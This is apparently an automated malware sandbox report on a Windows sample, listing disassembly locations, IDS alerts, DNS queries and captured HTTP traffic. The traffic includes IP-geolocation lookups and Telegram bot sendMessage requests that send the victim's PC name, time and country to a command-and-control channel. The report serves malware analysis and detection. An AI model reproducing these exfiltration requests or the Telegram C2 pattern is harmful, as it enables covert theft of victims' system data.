Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69BB33h	7_2_2D69B838
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69EB03h	7_2_2D69E808
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6910D9h	7_2_2D690E08
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6950EAh	7_2_2D694E18
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D697D0Bh	7_2_2D697A10
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69D7E3h	7_2_2D69D4E8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6947B9h	7_2_2D6944E8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D692791h	7_2_2D6924C0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6999BBh	7_2_2D6996C0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6907A9h	7_2_2D6904D8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6981D3h	7_2_2D697ED8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69EFCBh	7_2_2D69ECD0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69B1A3h	7_2_2D69AEA8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D691571h	7_2_2D6912A0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D695581h	7_2_2D6952B0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D693559h	7_2_2D693288
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69737Bh	7_2_2D697080
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69C98Bh	7_2_2D69C690
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6C2983h	7_2_2D6C2688
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6C1663h	7_2_2D6C1368
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6C0803h	7_2_2D6C0508
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6C24BBh	7_2_2D6C21C0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6C0CCBh	7_2_2D6C09D0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6C033Bh	7_2_2D6C0040
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6C1B2Bh	7_2_2D6C1830
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6C1FF3h	7_2_2D6C1CF8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6C1194h	7_2_2D6C0E98
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then mov ecx, 000003E8h	7_2_2D84FE58
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_2D8451F0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_2D842061
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_2D841D38
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_2D841D48
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then mov ecx, 000003E8h	7_2_2D84FE48
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_2D8451DF
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then push 00000000h	7_2_2E2E11B8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49727 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49752 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49762 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2018/02/2025%20/%2014:26:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2018/02/2025%20/%2018:40:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2018/02/2025%20/%2015:06:25%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49746 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49735 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49730 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49742 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49706 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49725 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49712 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49750 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49708 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49733 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49723 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49729 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49731 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49741 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49755 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49707 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49728 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49738 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2018/02/2025%20/%2014:26:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2018/02/2025%20/%2018:40:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2018/02/2025%20/%2015:06:25%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
